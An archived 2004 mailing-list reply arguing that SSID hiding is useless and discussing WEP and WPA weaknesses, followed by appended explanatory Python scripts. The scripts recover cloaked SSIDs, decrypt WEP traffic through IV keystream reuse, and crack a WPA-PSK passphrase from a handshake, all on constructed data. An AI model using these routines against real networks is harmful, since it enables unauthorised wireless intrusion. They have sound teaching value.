Two security-related questions for wireless

Michael H. Warfield mhw at wittsend.com
Sat Jul 10 10:06:12 UTC 2004


Hey all,

On Sat, Jul 10, 2004 at 12:43:49AM -0400, J. Erik Hemdal wrote:

> > On Fri, 9 Jul 2004, Rick Stevens wrote:

> > > Terry Linhardt wrote:
> > > > I'm running Core 2, and from a laptop using a wireless (802.11-B) 
> > > > card to reach a WAP.  I have absolutely no problems in using a 
> > > > wireless configuration *provided* I broadcast my SSID.  But, as 
> > > > soon as I no longer broadcast my SSID my wireless card 
> > > > cannot "find" the WAP.

> > > > Two questions:

> > > > 1) How can I configure my system to access my WAP by its 
> > > > assigned ID.

> > > I'm not sure you can.  The ESSID is required or your card can't find 
> > > the network in the first place.  You might be able to bypass it by 
> > > forcing "CHANNEL=" in your ifcfg-wlan0 file, but I won't 
> > > guarantee it.  
> > > BTW, what's your aversion to broadcasting your ESSID?  If you use a 
> > > WEP key, your network isn't really that susceptible to attack.

> > I think that if the WAP doesn't broadcast, then the station 
> > needs to specify the correct SSID.  If the WAP does broadcast 
> > then the station can "adopt" the broadcast SSID.

> Yes, and the client (your laptop) needs to know the channel you're using
> (often this is channel 6 by default).  Basically, when the access point
> fails to broadcast, the clients need to know everything about the connection
  ^^^^^^^^^^^^^^^^^^
	Fails to broadcast the ESSID.  It's still transmitting beacons.
Kismet picks them up REAL GOOD.  Maybe you are thinking of Ad Hoc mode
(which is something totally different and Kismet will still pick that
up once traffic begins).

> before it will work. SSID alone won't do it.  You can set the channel by
> correctly fiddling with redhat-config-network and editing the proper
> interface.  Use system-config-network on FC2.

	Turning off ESSID is virtually worthless from a security
standpoint (and some access points won't even let you do it).  Try
running Kismet for a while and you'll find out.  As soon as you get
even a decent amount of traffic to the AP, Kismet will capture the
ESSID from the traffic.  So, what did you really gain by not broadcasting
the ESSID?  Under some circumstances, you can even actively probe
a "cloaked" network and uncover its ESSID.

> > It's not clear to me what the point of broadcasting is if you 
> > then install WEP keys.

> This makes connection a little easier.  Some access points will deliver a
> WEP key automatically, so that you have encrypted transfers on a network
> that is publicly-available.

	That's not WEP.  That gets into WPA and/or 802.11i and/or 802.1x
and some other proprietary schemes.  Mostly, with public access points,
it will be WPA for which you need the supplicant client.

> > > > 2) On a related security issue, how can I make use of WEP 
> > > > encryption.

> > > Make sure your WAPs all have the same key (MINIMUM 128-bit 
> > > encryption) 

	You've only really got two choices, 40 bit and 128 bit.  40 bit
is the old, deprecated, export grade encryption.  128 bit uses the
RC4 stream cipher with a 104 bit key from you (which is why it's
26 hex digits if you use hex mode) and a 24 bit "initialization
vector" that it generates on a packet by packet basis.  If you've got
a reasonably modern AP, the AP will choose IVs (which are pretty much
arbitrary) in such a way as to avoid the weak key scheduling problem
with RC4 used in WEP.  Best way to know is to run Kismet for a while
and see if it captures any "weak encrypted packets".  WEP still has
its problems (still subject to the known plaintext codebook attack)
but you have to capture massive amounts of data (~2Gig) for which
you know both the plaintext and ciphertext.  WPA PSK (WPA Pre-Shared
Key) has its own problems and may even be weaker if you use a short
passphrase (minimum 17 characters or it can be busted by capturing
just a few packets).

> The encryption level is going to be set by the minimum encryption that all
> your wireless clients can support.  In my experience, Windows XP doesn't
> support 128-bit encryption.  This might prevent you from going to stronger
> encryption.

	This is incorrect.  W2K used to only support 128-bit encryption
if you installed the "high encryption pack" but that went away back in
an early service pack (SP2?  SP3?).  AFAIK...  Windows XP has pretty much
always supported 128-bit encryption.  Even if the initial version did not
(I THINK it did), you can't run Windows XP without SP1 (soon to be SP2 -
PLEASE INSTALL WHEN IT COMES OUT) and all the security roll-ups on the
Internet without getting infected in minutes, so you either have 128 bit
encryption or you have much bigger problems.

> > > Like I said, I'm not sure you need to hide your ESSID in the first 
> > > place.

	You don't.

> Probably for the same reason you set up a firewall rather than closing all
> your ports.  You can't hack a network you can't see.

	Now THAT'S a load of bull.  You can see that network just fine
and Kismet can find it just fine.  It can see your beacon and identify
an active network that is not broadcasting its ESSID (aka - Red Flag!
Watch this network!) and it can capture the ESSID from live traffic.

	And don't say you can't hack a network you can't see.  LOTS
of networks get hacked every day that hackers can't see.  Worms do
that real good.  Worms and hacks get behind NAT devices everyday.
Took the "Witty worm" (which I tracked) less than 10 seconds to
slip behind a NAT firewall and get into a "network it couldn't see".

	Hiding the ESSID does not hide the network (hell, it doesn't
even really hide the ESSID).  Hiding the network doesn't prevent hacking.
Turning off the ESSID does not accomplish any significant security.

	Use WPA with a strong password, if you have it available.  If
not, use 128 bit WEP and use Kismet to test your access points for
strong scheduling of IVs (replace or upgrade if they don't).  You
should be pretty solid.

> Erik

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw at WittsEnd.com
  /\/\|=mhw=|\/\/       |  (678) 463-0932   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
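[Editor's added example, not part of Mike's message or the thread.]  The point above that a "cloaked" AP is still beaconing, and that the name comes out of the traffic anyway, is easy to see at the frame level.  The script below builds a beacon with an empty SSID element and an association request from a client, then parses the tagged parameters the way a passive sniffer would.  The frames, MAC addresses and the SSID "lab-wlan" are constructed for the example (nothing here is a capture), and only the Python standard library is used, so it runs without a wireless card or Kismet.

```python
"""Added example (not from the thread): parse 802.11 management frames to show
what SSID "cloaking" really hides.  A cloaked AP still beacons; only the SSID
element in the beacon is empty, and the first client that associates sends
the name in the clear.  All frames below are constructed by hand, not captured.
"""
import struct

ELEMENT_SSID = 0                      # information element id for the SSID
SUBTYPE_ASSOC_REQ = 0                 # management subtypes we care about
SUBTYPE_PROBE_REQ = 4
SUBTYPE_PROBE_RESP = 5
SUBTYPE_BEACON = 8
# Bytes of fixed fields that sit between the 24-byte header and the elements.
FIXED_LEN = {SUBTYPE_ASSOC_REQ: 4, SUBTYPE_PROBE_REQ: 0,
             SUBTYPE_PROBE_RESP: 12, SUBTYPE_BEACON: 12}


def mac(text):
    return bytes.fromhex(text.replace(':', ''))


def element(eid, value):
    """One tagged parameter: id, length, value."""
    return bytes([eid, len(value)]) + value


def mgmt_frame(subtype, addr1, addr2, bssid, body):
    # Frame control: protocol 0, type 0 (management), subtype in the high nibble.
    fc = subtype << 4
    return struct.pack('<HH6s6s6sH', fc, 0, addr1, addr2, bssid, 0) + body


def beacon(bssid, ssid, cloaked):
    # timestamp, beacon interval, capability (ESS + Privacy, i.e. WEP on)
    fixed = struct.pack('<QHH', 0, 100, 0x0011)
    advertised = b'' if cloaked else ssid   # "hidden" SSID = zero-length element
    body = fixed + element(ELEMENT_SSID, advertised) + element(3, b'\x06')  # DS param: channel 6
    return mgmt_frame(SUBTYPE_BEACON, mac('ff:ff:ff:ff:ff:ff'), bssid, bssid, body)


def assoc_request(client, bssid, ssid):
    # capability, listen interval, then the SSID the client wants to join
    fixed = struct.pack('<HH', 0x0011, 10)
    return mgmt_frame(SUBTYPE_ASSOC_REQ, bssid, client, bssid,
                      fixed + element(ELEMENT_SSID, ssid))


def elements(frame):
    """Return (subtype, {element id: first value}) for one management frame."""
    fc = frame[0]
    if (fc >> 2) & 3 != 0:
        raise ValueError('not a management frame')
    subtype = fc >> 4
    pos = 24 + FIXED_LEN[subtype]
    found = {}
    while pos + 2 <= len(frame):
        eid, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if len(value) < length:
            break                          # truncated trailing element
        found.setdefault(eid, value)
        pos += 2 + length
    return subtype, found


def survey(frames):
    """What a passive sniffer learns, per BSSID: whether it beacons, whether
    the beacon is cloaked, and the SSID once any frame carries it."""
    nets = {}
    for frame in frames:
        subtype, ies = elements(frame)
        bssid = frame[16:22].hex(':')          # addr3 is the BSSID in these subtypes
        ssid = ies.get(ELEMENT_SSID, b'')
        net = nets.setdefault(bssid, {'beaconing': False, 'cloaked': None, 'ssid': None})
        if subtype == SUBTYPE_BEACON:
            net['beaconing'] = True
            net['cloaked'] = ssid.strip(b'\x00') == b''   # some APs send NULs instead
            if not net['cloaked']:
                net['ssid'] = ssid.decode('utf-8', 'replace')
        elif subtype in (SUBTYPE_ASSOC_REQ, SUBTYPE_PROBE_RESP) and ssid:
            net['ssid'] = ssid.decode('utf-8', 'replace')   # recovered from traffic
    return nets


# Constructed sample: one cloaked AP and one client joining it.  Addresses
# and the SSID are made up for the example.
AP = mac('00:0c:41:12:34:56')
CLIENT = mac('00:0e:35:ab:cd:ef')
SAMPLE = [
    beacon(AP, b'lab-wlan', cloaked=True),
    assoc_request(CLIENT, AP, b'lab-wlan'),
    beacon(AP, b'lab-wlan', cloaked=True),
]

if __name__ == '__main__':
    for bssid, net in survey(SAMPLE).items():
        print(bssid, net)
```

After the first beacon the survey already lists the BSSID as beaconing and cloaked (the "red flag" Mike describes); the association request fills in the name.  Probe requests are deliberately left out of the BSSID mapping because their addr3 is the broadcast address, though they carry the SSID in the clear just the same.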

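[Editor's added example, not part of Mike's message or the thread.]  The WEP paragraph above packs in several things worth seeing in code: the two real key sizes (5 or 13 bytes, hence 10 or 26 hex digits in a KEY= line), the per-packet 24-bit IV prepended to the key before RC4, the FMS "weak IV" class that Kismet flags as weak encrypted packets, and why reusing an IV with known plaintext hands over the keystream.  The RC4 routine, key formats and IV check below follow the WEP spec and the original FMS paper; the key, IVs and payloads are made up for the example, and the counter-based IV generator is a stand-in for whatever a given AP does.

```python
"""Added example (not from the thread): WEP's packet format, the 40/104-bit
key sizes, the FMS "weak IV" check, and the keystream reuse that makes IV
collisions fatal.  Keys, IVs and payloads are constructed for the example.
"""
import struct
import zlib


def rc4(key, data):
    """Plain RC4: key scheduling, then the generator XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_wep_key(text):
    """Accept a KEY= value as ifcfg/iwconfig write it: 10 or 26 hex digits,
    or 's:' followed by 5 or 13 ASCII characters."""
    key = text[2:].encode() if text.startswith('s:') else bytes.fromhex(text)
    if len(key) not in (5, 13):
        raise ValueError('WEP keys are 40 or 104 bits, got %d' % (len(key) * 8))
    return key


def wep_encrypt(key, iv, plaintext, key_id=0):
    """IV (3 bytes) || key-id byte || RC4(IV || key) over plaintext || CRC-32 ICV."""
    icv = struct.pack('<I', zlib.crc32(plaintext))
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv)


def wep_decrypt(key, frame):
    iv, body = frame[:3], frame[4:]
    data = rc4(iv + key, body)
    plaintext, icv = data[:-4], data[-4:]
    if struct.pack('<I', zlib.crc32(plaintext)) != icv:
        raise ValueError('ICV mismatch')
    return plaintext


def is_fms_weak_iv(iv, key_len):
    """Classic FMS "resolved" IVs: (A+3, 0xFF, X) leak secret key byte A.
    Only this original class is checked; later attacks use more classes."""
    return iv[1] == 0xFF and 3 <= iv[0] < key_len + 3


def iv_sequence(start, count, key_len, avoid_weak):
    """A counter-based IV generator (an assumed design, not any specific AP),
    with or without the weak-IV filter a reasonably modern AP applies."""
    ivs, n = [], start
    while len(ivs) < count:
        iv = (n & 0xFFFFFF).to_bytes(3, 'little')
        n += 1
        if avoid_weak and is_fms_weak_iv(iv, key_len):
            continue
        ivs.append(iv)
    return ivs


def iv_collision_leak(known_frame, known_plaintext, other_frame):
    """Two frames under one IV share a keystream: XOR the known frame with its
    plaintext (plus ICV) to get the keystream, then strip it off the other.
    Returns the other frame's plaintext, as far as the keystream reaches."""
    if known_frame[:3] != other_frame[:3]:
        return None
    known = known_plaintext + struct.pack('<I', zlib.crc32(known_plaintext))
    keystream = bytes(c ^ p for c, p in zip(known_frame[4:], known))
    recovered = bytes(c ^ k for c, k in zip(other_frame[4:], keystream))
    return recovered[:len(other_frame) - 8]   # header and ICV removed


KEY = parse_wep_key('0123456789abcdef0123456789')   # 26 hex digits = 104-bit key
IV = b'\x03\xff\x7a'                                 # an FMS-weak IV, on purpose

if __name__ == '__main__':
    request = b'GET / HTTP/1.0\r\n'
    frame = wep_encrypt(KEY, IV, request)
    print('decrypts ok:', wep_decrypt(KEY, frame) == request)
    print('weak IV:', is_fms_weak_iv(IV, len(KEY)))
    naive = iv_sequence(0, 65536, len(KEY), avoid_weak=False)
    print('weak IVs among 65536 naive counter IVs:',
          sum(is_fms_weak_iv(iv, len(KEY)) for iv in naive))
    other = wep_encrypt(KEY, IV, b'secret payload!')
    print('read without the key:', iv_collision_leak(frame, request, other))
```

Two things to take from running it: a plain counter walks straight through the weak class (13 of the first 65536 IVs here, one per secret key byte), which is exactly what the Kismet check in the message is looking for; and with only 2^24 IVs, collisions are a matter of time, so one known plaintext (an ARP or HTTP request) under a repeated IV reads the other packet with no key recovery at all.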

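[Editor's added example, not part of Mike's message or the thread.]  The closing advice is WPA with a strong passphrase, and the WEP paragraph warns that a short WPA-PSK passphrase can be broken from a few captured packets.  The mechanics behind that warning: the PSK is PBKDF2-HMAC-SHA1 of the passphrase with the SSID as salt (4096 iterations, 32 bytes), the pairwise keys come from a PRF over the two MAC addresses and the two handshake nonces, and the first 16 bytes key the MIC on the handshake messages.  Everything an attacker needs to test a guess is in the four-way handshake, so the attack is offline.  The script below builds a handshake message 2 for a made-up network and then recovers the passphrase from a small wordlist; SSID, addresses, nonces, wordlist and passphrase are all constructed, not captured.

```python
"""Added example (not from the thread): why a short WPA-PSK passphrase falls
to a captured 4-way handshake.  PMK = PBKDF2-SHA1(passphrase, SSID, 4096, 32);
PTK = PRF-512(PMK, sorted MACs, sorted nonces); the KCK (first 16 bytes of
the PTK) keys the MIC on message 2, which can be recomputed per guess.  The
handshake here is constructed, not captured.
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81          # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields


def pmk_from_passphrase(passphrase, ssid):
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512: HMAC-SHA1 with label 'Pairwise key expansion' over sorted
    (AA, SPA) and sorted (ANonce, SNonce), four blocks, truncated to 64 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b''
    for i in range(4):
        out += hmac.new(pmk, b'Pairwise key expansion\x00' + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_zeroed_mic, version):
    """Key descriptor version 1 (TKIP): HMAC-MD5; version 2 (CCMP): HMAC-SHA1.
    Both are truncated to 16 bytes and computed with the MIC field zeroed."""
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_zeroed_mic, digest).digest()[:16]


def eapol_key_msg2(snonce, key_info=0x010a, mic=b'\x00' * 16):
    """Handshake message 2 (station -> AP), WPA descriptor type 0xFE.
    key_info 0x010a = MIC bit + pairwise bit + descriptor version 2."""
    body = (struct.pack('>BHH', 0xFE, key_info, 0)               # type, key info, key length
            + (1).to_bytes(8, 'big')                              # replay counter
            + snonce + b'\x00' * 16 + b'\x00' * 8 + b'\x00' * 8   # nonce, IV, RSC, ID
            + mic + struct.pack('>H', 0))                         # MIC, key data length
    return struct.pack('>BBH', 1, 3, len(body)) + body            # 802.1X v1, EAPOL-Key


def sign_msg2(passphrase, ssid, aa, spa, anonce, snonce):
    """What the station does with the real passphrase: build and MIC message 2."""
    frame = eapol_key_msg2(snonce)
    version = struct.unpack_from('>H', frame, 5)[0] & 7
    kck = ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame, version)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per guess; no more
    packets are needed once the handshake has been captured."""
    version = struct.unpack_from('>H', msg2, 5)[0] & 7
    mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + b'\x00' * 16 + msg2[MIC_OFFSET + 16:]
    for guess in wordlist:
        kck = ptk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, version), mic):
            return guess
    return None


# Constructed capture: addresses, nonces, wordlist and passphrase are made up.
SSID = 'lab-wlan'
AA = bytes.fromhex('000c41123456')        # AP
SPA = bytes.fromhex('000e35abcdef')       # station
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ['password', 'letmein', 'wireless', 'fedora2004', 'linksys1']
CAPTURED_MSG2 = sign_msg2('wireless', SSID, AA, SPA, ANONCE, SNONCE)

if __name__ == '__main__':
    found = crack_psk(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST)
    print('recovered passphrase:', found)
```

The cost per guess is fixed by the 4096 PBKDF2 iterations, so the only defence the network owner controls is the size of the space the attacker has to search: a long, non-dictionary passphrase.  Note also that the SSID is the PBKDF2 salt, so a common SSID lets precomputed tables be reused across networks.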